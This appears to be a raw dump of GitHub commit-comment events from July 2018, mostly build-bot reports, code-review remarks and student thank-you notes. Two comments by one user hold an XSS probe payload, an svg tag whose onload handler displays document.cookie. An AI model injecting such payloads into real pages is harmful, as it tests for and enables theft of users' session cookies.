{"id":"7964691644","type":"CommitCommentEvent","actor":{"login":"fjessica"},"repo":{"name":"CodeNext-CSSI-OAK/codenext-cssi-2018-fjessica"},"payload":{"comment":{"id":29706370,"position":null,"line":null,"path":null,"commit_id":"1798441e1b52d003024559ab8eb74fa01b46df09","created_at":"2018-07-13T22:50:33Z","updated_at":"2018-07-13T22:50:33Z","author_association":"COLLABORATOR","body":"Finally done. My head is still hurting but **WHATEVER**, I'm done so I'm happy and tired. I hope I sleep well tonight and get enough energy for tomorrow and the rest of the CSSI, plus Jailyn helped so much. Thanks to her and coach aaron i am finished."}},"created_at":"2018-07-13T22:50:33Z"}
{"id":"7964692297","type":"CommitCommentEvent","actor":{"login":"yihhwang"},"repo":{"name":"dnanexus/dx_ritchie"},"payload":{"comment":{"id":29706373,"position":90,"line":169,"path":"sequencing/vcf_annotate/dxapp.json","commit_id":"1ecb176bcf86c0fcfbe5b88f6ef7d19964173caa","created_at":"2018-07-13T22:50:47Z","updated_at":"2018-07-13T22:50:47Z","author_association":"COLLABORATOR","body":"Please update record IDs to:\r\naws:us-east-1: record-FJ3zf8j08zVZFzqYG88Pbk7z\r\nazure:westus: record-FJ4058j9Vf9ZBBVB2Q7b3VQz"}},"created_at":"2018-07-13T22:50:47Z"}
{"id":"7964692619","type":"CommitCommentEvent","actor":{"login":"az3749"},"repo":{"name":"kipr/opencv"},"payload":{"comment":{"id":29706375,"position":null,"line":null,"path":null,"commit_id":"cb58e5a3a4c72eb065daf7d3e1ab04754533f9ee","created_at":"2018-07-13T22:50:56Z","updated_at":"2018-07-13T22:50:56Z","author_association":"NONE","body":"changes to kalman.cpp\r\n\r\n /* handle the case when there will be measurement before the next predict */\r\n`+`    cvCopy(kalman->state_pre,  kalman->state_post);\r\n\r\naffected the functionality of the blob_tracking. blobtrack_sample.cpp, which worked fine in opencv 1.x and people liked it, became jerking,flushing and not fuctional. see  https://www.youtube.com/playlist?list=PLTHEHHPuck7LmQtv_DE9dFrOsr9FunIGY"}},"created_at":"2018-07-13T22:50:56Z"}
{"id":"7964693144","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706378,"position":null,"line":null,"path":null,"commit_id":"6d18617cb3366018d90cde71d16ab3766061e2cd","created_at":"2018-07-13T22:51:08Z","updated_at":"2018-07-13T22:51:08Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2315 of 2315 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d18617cb3366018d90cde71d16ab3766061e2cd-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d18617cb3366018d90cde71d16ab3766061e2cd-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T22:51:08Z"}
{"id":"7964695241","type":"CommitCommentEvent","actor":{"login":"d4rkcod3r"},"repo":{"name":"d4rkcod3r/metaq.taobao.org"},"payload":{"comment":{"id":29706385,"position":2,"line":2,"path":"index.md","commit_id":"124cc9a9e6aa43f19506b8350b0347b84031a40a","created_at":"2018-07-13T22:52:00Z","updated_at":"2018-07-13T22:52:00Z","author_association":"OWNER","body":"<html>\r\n<head></head>\r\n<body>“><svg onload=\"prompt(document.cookie);\"></body>\r\n</html>``"}},"created_at":"2018-07-13T22:52:00Z"}
{"id":"7964695601","type":"CommitCommentEvent","actor":{"login":"d4rkcod3r"},"repo":{"name":"d4rkcod3r/metaq.taobao.org"},"payload":{"comment":{"id":29706387,"position":2,"line":2,"path":"index.md","commit_id":"124cc9a9e6aa43f19506b8350b0347b84031a40a","created_at":"2018-07-13T22:52:09Z","updated_at":"2018-07-13T22:52:09Z","author_association":"OWNER","body":"<html>\r\n<head></head>\r\n<body>“><svg onload=\"prompt(document.cookie);\"></body>\r\n</html>"}},"created_at":"2018-07-13T22:52:09Z"}
{"id":"7964696202","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29706390,"position":null,"line":null,"path":null,"commit_id":"9e6fbe57051757d6491a07c196dabd132aeb9e51","created_at":"2018-07-13T22:52:24Z","updated_at":"2018-07-13T22:52:24Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/9e6fbe57051757d6491a07c196dabd132aeb9e51/index.html"}},"created_at":"2018-07-13T22:52:24Z"}
{"id":"7964698994","type":"CommitCommentEvent","actor":{"login":"levelupstudent"},"repo":{"name":"CodeNext-CSSI-OAK/codenext-cssi-2018-levelupstudent"},"payload":{"comment":{"id":29706395,"position":null,"line":null,"path":null,"commit_id":"e78266dcaace206ac9b7251825938a5e628a8b42","created_at":"2018-07-13T22:53:30Z","updated_at":"2018-07-13T22:53:30Z","author_association":"COLLABORATOR","body":"1. I AM SO HAPPY\r\n2. I AM SO TIRED \r\n3. THANKS JESSICA AND COACH AARON & (this fan it cooled my head off)"}},"created_at":"2018-07-13T22:53:30Z"}
{"id":"7964700233","type":"CommitCommentEvent","actor":{"login":"junaruga"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":29706397,"position":46,"line":101,"path":"dnf/cli/commands/install.py","commit_id":"d79f660af6d5262d25f23931e0620cb9b866d642","created_at":"2018-07-13T22:53:55Z","updated_at":"2018-07-13T22:53:55Z","author_association":"NONE","body":"Sorry this behavior was same with dnf 2.x. Forget this."}},"created_at":"2018-07-13T22:53:55Z"}
{"id":"7964701591","type":"CommitCommentEvent","actor":{"login":"gpotter2"},"repo":{"name":"gpotter2/scapy"},"payload":{"comment":{"id":29706398,"position":null,"line":null,"path":null,"commit_id":"48611de73d11bf0e5fc76da254df4d1ff6598be3","created_at":"2018-07-13T22:54:20Z","updated_at":"2018-07-13T22:54:20Z","author_association":"OWNER","body":"This commit is buggy and overwritten by https://github.com/gpotter2/scapy/commit/c1ca3f2edd0a52d1d8a216c57d2175605460a3c5"}},"created_at":"2018-07-13T22:54:20Z"}
{"id":"7964702655","type":"CommitCommentEvent","actor":{"login":"aaronjense"},"repo":{"name":"wolfSSL/wolfcrypt-jni"},"payload":{"comment":{"id":29706405,"position":null,"line":null,"path":null,"commit_id":"0ac485039aca3e6fbef02d164e9f7be6e952586e","created_at":"2018-07-13T22:54:40Z","updated_at":"2018-07-13T22:54:40Z","author_association":"NONE","body":"HAVE_FIPS_VERSION is defined at the C level. getFipsVersion is a method to port HAVE_FIPS_VERSION into java scope.  This was primarily used in WolfCryptCipherTest.java to expect the right error depending if using FIPS and which version of FIPS.\r\n\r\nAll possible values for HAVE_FIPS_VERSION was unknown.  0 was chosen as a default for not having FIPS but this may need to be changed."}},"created_at":"2018-07-13T22:54:40Z"}
{"id":"7964704954","type":"CommitCommentEvent","actor":{"login":"tpruvot"},"repo":{"name":"216k155/lux"},"payload":{"comment":{"id":29706411,"position":16,"line":2951,"path":"src/main.cpp","commit_id":"bb96270bf1285bba66ae2768ede66706c05519f7","created_at":"2018-07-13T22:55:31Z","updated_at":"2018-07-13T22:55:31Z","author_association":"COLLABORATOR","body":"please keep this one, its the only way to see the progress on linux (without qt)\r\n\r\nheight=319208  log2_work=64.154091  tx=660256  date=2018-07-13 22:36:00 progress=0.972374"}},"created_at":"2018-07-13T22:55:31Z"}
{"id":"7964705289","type":"CommitCommentEvent","actor":{"login":"IharVypau"},"repo":{"name":"IharVypau/or-2"},"payload":{"comment":{"id":29706413,"position":null,"line":null,"path":null,"commit_id":"50cea62698c5fb175fd6fdb172bb7aac9b36db07","created_at":"2018-07-13T22:55:38Z","updated_at":"2018-07-13T22:55:38Z","author_association":"OWNER","body":"Так как проверка выполняется слева на право, то сперва выполняется операция сравнения по количеству, чтобы не перебирать весь массив( для скорости выполнения программы) в случае если они разной длины"}},"created_at":"2018-07-13T22:55:38Z"}
{"id":"7964706064","type":"CommitCommentEvent","actor":{"login":"fjessica"},"repo":{"name":"CodeNext-CSSI-OAK/codenext-cssi-2018-levelupstudent"},"payload":{"comment":{"id":29706416,"position":null,"line":null,"path":null,"commit_id":"e78266dcaace206ac9b7251825938a5e628a8b42","created_at":"2018-07-13T22:55:56Z","updated_at":"2018-07-13T22:55:56Z","author_association":"NONE","body":"I want to appreciate Jailyn for working with me on this project. It was difficult but we survived. We actually understood and wrote most of the code by ourselves. Also thanks Coach Aaron. Oh, I am so proud of sitting here next to the fan too. "}},"created_at":"2018-07-13T22:55:56Z"}
{"id":"7964706487","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/hub-feedstock"},"payload":{"comment":{"id":29706417,"position":null,"line":null,"path":null,"commit_id":"a48cde3934aa01003370edc145c5955b036a9dce","created_at":"2018-07-13T22:56:09Z","updated_at":"2018-07-13T22:56:09Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @asford were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @asford were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-13T22:56:09Z"}
{"id":"7964707112","type":"CommitCommentEvent","actor":{"login":"aaronjense"},"repo":{"name":"wolfSSL/wolfcrypt-jni"},"payload":{"comment":{"id":29706420,"position":null,"line":null,"path":null,"commit_id":"6e895a73c804117c9bd17e0ddacafd98a911baea","created_at":"2018-07-13T22:56:22Z","updated_at":"2018-07-13T22:56:22Z","author_association":"NONE","body":"Removes \"_fips\" suffix if using FIPS version 2 and above.  "}},"created_at":"2018-07-13T22:56:22Z"}
{"id":"7964708396","type":"CommitCommentEvent","actor":{"login":"IharVypau"},"repo":{"name":"IharVypau/or-2"},"payload":{"comment":{"id":29706427,"position":15,"line":15,"path":"eleventhLesson/script.js","commit_id":"50cea62698c5fb175fd6fdb172bb7aac9b36db07","created_at":"2018-07-13T22:56:51Z","updated_at":"2018-07-13T22:56:51Z","author_association":"OWNER","body":"Так как проверка выполняется слева на право, то сперва выполняется операция сравнения по количеству, чтобы не перебирать весь массив( для скорости выполнения программы) в случае если они разной длины"}},"created_at":"2018-07-13T22:56:51Z"}
{"id":"7964711847","type":"CommitCommentEvent","actor":{"login":"kishor82"},"repo":{"name":"kishor82/book-exercises"},"payload":{"comment":{"id":29706440,"position":null,"line":null,"path":null,"commit_id":"d98963f2a886e4636682d2a77e0a99e57919c643","created_at":"2018-07-13T22:58:18Z","updated_at":"2018-07-13T22:58:18Z","author_association":"OWNER","body":"'bear eat door ' will not raise exception."}},"created_at":"2018-07-13T22:58:18Z"}
{"id":"7964714724","type":"CommitCommentEvent","actor":{"login":"diemoschwarz"},"repo":{"name":"Ircam-RnD/catart-mubu"},"payload":{"comment":{"id":29706453,"position":null,"line":null,"path":null,"commit_id":"0eca5499f2cb559af71b826bfa24197fa44b4484","created_at":"2018-07-13T22:59:26Z","updated_at":"2018-07-13T22:59:26Z","author_association":"MEMBER","body":"great job! here it would be best to have the weights multislider and list of descr. names  in the main patch"}},"created_at":"2018-07-13T22:59:26Z"}
{"id":"7964721694","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29706478,"position":null,"line":null,"path":null,"commit_id":"387ee83228852ecfe22d03abee2fbb976ca1f473","created_at":"2018-07-13T23:01:56Z","updated_at":"2018-07-13T23:01:56Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-759](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-759).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-759-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T23:01:56Z"}
{"id":"7964723467","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29706483,"position":null,"line":null,"path":null,"commit_id":"152bd9bf0487496399824e02ba340ed01a6bce12","created_at":"2018-07-13T23:02:41Z","updated_at":"2018-07-13T23:02:41Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-12](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#ci-12).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-12-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-13T23:02:41Z"}
{"id":"7964733229","type":"CommitCommentEvent","actor":{"login":"CharlyJazz"},"repo":{"name":"luigi055/Webpack-tutorial"},"payload":{"comment":{"id":29706503,"position":null,"line":null,"path":null,"commit_id":"f1693d3100d528c94a59f1da39752d72988fea9f","created_at":"2018-07-13T23:06:33Z","updated_at":"2018-07-13T23:06:33Z","author_association":"NONE","body":"I need thiiiiiis in my current front end project, thank bro @luigi055 "}},"created_at":"2018-07-13T23:06:33Z"}
{"id":"7964733667","type":"CommitCommentEvent","actor":{"login":"mictab"},"repo":{"name":"svenanderzen/lps-tools"},"payload":{"comment":{"id":29706504,"position":5,"line":6,"path":"setup.py","commit_id":"a7b9fa29e25feea5055615d73bb5e6f802c55fb4","created_at":"2018-07-13T23:06:45Z","updated_at":"2018-07-13T23:06:45Z","author_association":"NONE","body":"This is a great thought, very nice."}},"created_at":"2018-07-13T23:06:45Z"}
{"id":"7964733752","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706507,"position":null,"line":null,"path":null,"commit_id":"814372513e0b5ca20e00518737f7c55dc7bf5dbf","created_at":"2018-07-13T23:06:47Z","updated_at":"2018-07-13T23:06:47Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2927 of 2936 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 9 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 9 tests had: Table big diffs.\n * 1 test had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 614\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.69%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T23:06:47Z"}
{"id":"7964734929","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29706510,"position":null,"line":null,"path":null,"commit_id":"f5ce65c2428b266ce4d3b141b6ffc6366da3b9f0","created_at":"2018-07-13T23:07:16Z","updated_at":"2018-07-13T23:07:16Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-react](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-react).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-react-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-13T23:07:16Z"}
{"id":"7964736104","type":"CommitCommentEvent","actor":{"login":"slabua"},"repo":{"name":"LineageOS/android_packages_apps_LockClock"},"payload":{"comment":{"id":29706512,"position":114,"line":188,"path":"res/values-en-rGB/strings.xml","commit_id":"552041ba4adb8deb251d9d8ce3741e6b822c5c6c","created_at":"2018-07-13T23:07:47Z","updated_at":"2018-07-13T23:07:47Z","author_association":"NONE","body":"This string should be correctly translated to english as \"Show all\", or equivalent."}},"created_at":"2018-07-13T23:07:47Z"}
{"id":"7964739265","type":"CommitCommentEvent","actor":{"login":"michalrus"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":29706519,"position":null,"line":null,"path":null,"commit_id":"8cffec84859cec8b610a2a22ab0c4d462a9351ff","created_at":"2018-07-13T23:09:12Z","updated_at":"2018-07-13T23:09:12Z","author_association":"NONE","body":"I used it locally, quite extensively, to lazily see which derivation failed in big updates.\r\n\r\nRIP. :candle: "}},"created_at":"2018-07-13T23:09:12Z"}
{"id":"7964741181","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29706522,"position":null,"line":null,"path":null,"commit_id":"073b64b7a6d5a145d395f11d8e5abffbc90b934f","created_at":"2018-07-13T23:10:04Z","updated_at":"2018-07-13T23:10:04Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-762](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-762).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-762-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T23:10:04Z"}
{"id":"7964741237","type":"CommitCommentEvent","actor":{"login":"markhartel"},"repo":{"name":"Kodama-Design/pwtc.com"},"payload":{"comment":{"id":29706523,"position":null,"line":null,"path":null,"commit_id":"be9beae28053ab8a1fa6ea77ee4f28ba72576857","created_at":"2018-07-13T23:10:06Z","updated_at":"2018-07-13T23:10:06Z","author_association":"CONTRIBUTOR","body":"Robert, please don't forget to rollback this change. We don't want it deployed to the website."}},"created_at":"2018-07-13T23:10:06Z"}
{"id":"7964741569","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"Srichon/-logo-PP_AcceptanceMarkTray-NoDiscover_243x40.png-alt-PayPal-a-td-tr-tabl"},"payload":{"comment":{"id":29706524,"position":1,"line":1,"path":"README.md","commit_id":"7111929fe04635665b2ebe6f353f82e9b98b3e2a","created_at":"2018-07-13T23:10:14Z","updated_at":"2018-07-13T23:10:14Z","author_association":"OWNER","body":"Final"}},"created_at":"2018-07-13T23:10:14Z"}
{"id":"7964744471","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"Srichon/-logo-PP_AcceptanceMarkTray-NoDiscover_243x40.png-alt-PayPal-a-td-tr-tabl"},"payload":{"comment":{"id":29706532,"position":1,"line":1,"path":"README.md","commit_id":"7111929fe04635665b2ebe6f353f82e9b98b3e2a","created_at":"2018-07-13T23:11:32Z","updated_at":"2018-07-13T23:11:32Z","author_association":"OWNER","body":"Thank you."}},"created_at":"2018-07-13T23:11:32Z"}
{"id":"7964744952","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"Srichon/-logo-PP_AcceptanceMarkTray-NoDiscover_243x40.png-alt-PayPal-a-td-tr-tabl"},"payload":{"comment":{"id":29706534,"position":null,"line":null,"path":null,"commit_id":"7111929fe04635665b2ebe6f353f82e9b98b3e2a","created_at":"2018-07-13T23:11:45Z","updated_at":"2018-07-13T23:11:45Z","author_association":"OWNER","body":"Win"}},"created_at":"2018-07-13T23:11:45Z"}
{"id":"7964747719","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"Srichon/-logo-PP_AcceptanceMarkTray-NoDiscover_243x40.png-alt-PayPal-a-td-tr-tabl"},"payload":{"comment":{"id":29706541,"position":16,"line":16,"path":".gitignore","commit_id":"7111929fe04635665b2ebe6f353f82e9b98b3e2a","created_at":"2018-07-13T23:13:00Z","updated_at":"2018-07-13T23:13:00Z","author_association":"OWNER","body":"<div class=\"LI-profile-badge\"  data-version=\"v1\" data-size=\"medium\" data-locale=\"en_US\" data-type=\"horizontal\" data-theme=\"light\" data-vanity=\"robdpowers\"><a class=\"LI-simple-link\" href='https://ca.linkedin.com/in/robdpowers?trk=profile-badge'>Robert P.</a></div>"}},"created_at":"2018-07-13T23:13:00Z"}
{"id":"7964748512","type":"CommitCommentEvent","actor":{"login":"dbaldan"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29706542,"position":null,"line":null,"path":null,"commit_id":"902ca32b8c4d9c5d9338afca441719e3fdf0f41c","created_at":"2018-07-13T23:13:20Z","updated_at":"2018-07-13T23:13:20Z","author_association":"NONE","body":"@whitedragon0000 how this Level_completed_defeating_boss works, exaclty? I have high interest on this,\r\nAlso, can we call this function \" kill_all_enemies()\" by script? I tried on my build (4432) and it doesn't works."}},"created_at":"2018-07-13T23:13:20Z"}
{"id":"7964748748","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29706546,"position":null,"line":null,"path":null,"commit_id":"1cfa0f47e287879779d2739e6fc132cc36706c9d","created_at":"2018-07-13T23:13:27Z","updated_at":"2018-07-13T23:13:27Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2002/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21580 seconds\n\nTests produced 2926 warnings. 2926 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-13T23:13:27Z"}
{"id":"7964750123","type":"CommitCommentEvent","actor":{"login":"nenti"},"repo":{"name":"wix/react-native-navigation"},"payload":{"comment":{"id":29706549,"position":null,"line":null,"path":null,"commit_id":"3fd183a51b55170b921db54cebbbdcb18d28cd05","created_at":"2018-07-13T23:14:03Z","updated_at":"2018-07-13T23:14:03Z","author_association":"NONE","body":"This commit breaks android build for me:\r\n\r\n```\r\n.java:50: error: cannot find symbol\r\n            bottomTabs.setTitleActiveTextSizeInSp(i, tab.selectedFontSize.hasValue() ? Float.valueOf(tab.selectedFontSize.get()) : null);\r\n```"}},"created_at":"2018-07-13T23:14:03Z"}
{"id":"7964758721","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29706576,"position":null,"line":null,"path":null,"commit_id":"0759a89f3f8dab0b12c3b0619d09d4b2b2717032","created_at":"2018-07-13T23:17:38Z","updated_at":"2018-07-13T23:17:38Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-13](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#ci-13).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-13-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-13T23:17:38Z"}
{"id":"7964759062","type":"CommitCommentEvent","actor":{"login":"codexp"},"repo":{"name":"Doloment/moreblocks"},"payload":{"comment":{"id":29706579,"position":null,"line":null,"path":null,"commit_id":"7bfc6b834d8058721607c3f14a107af563491096","created_at":"2018-07-13T23:17:46Z","updated_at":"2018-07-13T23:17:46Z","author_association":"NONE","body":"Russian translation has been added in PR minetest-mods/moreblocks:#121"}},"created_at":"2018-07-13T23:17:46Z"}
{"id":"7964759648","type":"CommitCommentEvent","actor":{"login":"novalic"},"repo":{"name":"novalic/rrsite"},"payload":{"comment":{"id":29706581,"position":null,"line":null,"path":null,"commit_id":"80cad31f1bb6e8a5aee9a2b137aa70f77606da48","created_at":"2018-07-13T23:18:01Z","updated_at":"2018-07-13T23:18:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [0001 : Create docker image for database](https://trello.com/c/8wbKcD95/1-0001-create-docker-image-for-database)"}},"created_at":"2018-07-13T23:18:01Z"}
{"id":"7964760442","type":"CommitCommentEvent","actor":{"login":"chubin"},"repo":{"name":"chubin/cheat.sh"},"payload":{"comment":{"id":29706585,"position":34,"line":20,"path":"bin/srv.py","commit_id":"26e102fc169c282021de11942be3c2c919adcefa","created_at":"2018-07-13T23:18:19Z","updated_at":"2018-07-13T23:18:19Z","author_association":"OWNER","body":"Yes, Per, it is without a doubt an error, you are right, please make a pull request"}},"created_at":"2018-07-13T23:18:19Z"}
{"id":"7964762496","type":"CommitCommentEvent","actor":{"login":"stefanofornari"},"repo":{"name":"beanshell/beanshell"},"payload":{"comment":{"id":29706597,"position":137,"line":295,"path":"src/main/java/bsh/Interpreter.java","commit_id":"9b4d2d746f0653be93dcbb1dbc8c4a53ba3c9430","created_at":"2018-07-13T23:19:12Z","updated_at":"2018-07-13T23:19:12Z","author_association":"CONTRIBUTOR","body":"@nickl- this one is a problem: if I set my ConsoleInterface implementation, it can not be replaced by another implementation. I see that we have also the secConsole(ConsoleAssignable) but I as a console I do not want that someone else arbitrarily can control the streams. I stuck at this point writing my PR because to me this refactory does not bring many benefits if we do not redesign Interpreter. At the moment Interpreter is doing too many things, which makes changing it very complicated... my simple use case:\r\n\r\n```\r\n//JLineConsoleInterface implements ConsoleInterface\r\nJLineConsoleInterface console = new JLineConsoleInterface(buildLineReader());\r\nInterpreter i = new Interpreter();\r\ni.setConsole(console);  // broken!\r\n```\r\n(of course I do not want my console to have assignable streams...) "}},"created_at":"2018-07-13T23:19:12Z"}
{"id":"7964766516","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706609,"position":null,"line":null,"path":null,"commit_id":"9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff","created_at":"2018-07-13T23:20:59Z","updated_at":"2018-07-13T23:20:59Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T23:20:59Z"}
{"id":"7964768968","type":"CommitCommentEvent","actor":{"login":"pradeepsenx"},"repo":{"name":"emeryberger/CSrankings"},"payload":{"comment":{"id":29706614,"position":null,"line":null,"path":null,"commit_id":"bff9e15ad8adc5a188f3476cf18b8eed0588cde2","created_at":"2018-07-13T23:22:06Z","updated_at":"2018-07-13T23:22:06Z","author_association":"NONE","body":"Added Pradeep Sen - UC Santa Barbara"}},"created_at":"2018-07-13T23:22:06Z"}
{"id":"7964771474","type":"CommitCommentEvent","actor":{"login":"interactivellama"},"repo":{"name":"salesforce/design-system-react"},"payload":{"comment":{"id":29706617,"position":null,"line":null,"path":null,"commit_id":"8ec0eb35145b8cac2e3f3861a8528596b995c89c","created_at":"2018-07-13T23:23:14Z","updated_at":"2018-07-13T23:23:14Z","author_association":"CONTRIBUTOR","body":"Thanks. Pushed up. https://github.com/salesforce/design-system-react/pull/1457"}},"created_at":"2018-07-13T23:23:14Z"}
{"id":"7964774750","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29706620,"position":null,"line":null,"path":null,"commit_id":"ffa5da31a39e95ba14ae61370f2ec6ddbb4e366d","created_at":"2018-07-13T23:24:36Z","updated_at":"2018-07-13T23:24:36Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-765](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-765).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-765-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T23:24:36Z"}
{"id":"7964785171","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"datasciencemasters/go"},"payload":{"comment":{"id":29706645,"position":null,"line":null,"path":null,"commit_id":"d66b849e26b76a7b33432d20597cea8a786f4c5c","created_at":"2018-07-13T23:29:11Z","updated_at":"2018-07-13T23:29:11Z","author_association":"NONE","body":"Thank you"}},"created_at":"2018-07-13T23:29:11Z"}
{"id":"7964786907","type":"CommitCommentEvent","actor":{"login":"elisno"},"repo":{"name":"jlapeyre/InverseLaplace.jl"},"payload":{"comment":{"id":29706654,"position":null,"line":null,"path":null,"commit_id":"9da744d80bdcfc6c86794d33fef4dd5aab22025f","created_at":"2018-07-13T23:30:00Z","updated_at":"2018-07-13T23:30:00Z","author_association":"NONE","body":"In the complex test case, the choice of `trange`  shows multiple oscillations of the original function but the approximation `Fc` will diverge for a slightly larger `trange`. Decreasing it may reduce the maximum absolute error.\r\nYou might also want to reduce the number of coefficients (1024) since I didn't put too much thought into the other parameters."}},"created_at":"2018-07-13T23:30:00Z"}
